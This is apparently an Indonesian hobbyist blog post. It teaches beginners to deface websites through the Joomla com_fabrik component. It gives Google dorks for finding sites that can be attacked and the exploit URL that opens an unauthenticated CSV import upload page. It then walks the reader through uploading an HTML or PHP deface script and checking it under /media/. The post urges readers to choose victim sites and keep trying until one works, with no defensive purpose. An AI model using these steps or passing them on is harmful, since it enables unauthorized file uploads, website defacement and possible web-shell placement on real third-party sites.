Whats'up guyss, kembali lagi di blog kecil gua, kali ini gua mau share cara deface web menggunakan metode com_fabrik, yang gua tau sih com_fabrik tuh semacem nitip file di web tertentu :). Inget, ini khusus buat pemula, yang udah master minggir dulu yaaa, sorry ster :) bahan-bahannya cuma dork, exploit sama script deface. Bahan-bahan ada dibawah. Langsung aja kita liat tutornya di TKP :)
DORK => inurl:viewtable?cid= intext:sorry this form is not published
inurl:index.php?option=com_fabrik
inurl:index.php/component/fabrik/ site:com
inurl:index.php?option=com_fabrik&view= site:com
inurl:importcsv.php site:com
inurl:viewTable?cid= site:com
NB: Pilih salah satu diantara dork-dork itu, Site boleh di ganti contoh .net .il .id dll, mis. site:netEXPLOIT => /index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
or
/index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1echercher
Scrip Dedece Keren
- Kalian buka google.com terus search dorknya di google
- Kalo udah ketemu, pilih salah satu web yang mau dideface
- Udah masuk ke webnya bukan? kalo udah kita tambahkan exploit di belakang URL web korban kita mis. webkorban.com/index.phpoption=com_fabrik&c=import&view=import&filetype=csv&table=1
- Ntar muncul halaman upload file (vuln), klik 'browse', pilih script agan yang mau diupload, terus klik 'import csv'
- Tunggu sebentar, kalo nanti munculnya halaman error, berarti agan berhasil deface web itu :) (ga sempet ss)
- Kalo mau cek hasilnya dibelakang URL target kasih tambahan /media/nama_scriptdeface.html mis. webtarget.com/media/dhea.html (filenya bisa berupa html/php)
"Tidak semua website bisa di eksploitasi dgn teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"
Sekian tutor deface dari gua, sampai berjumpa postingan berikutnya.
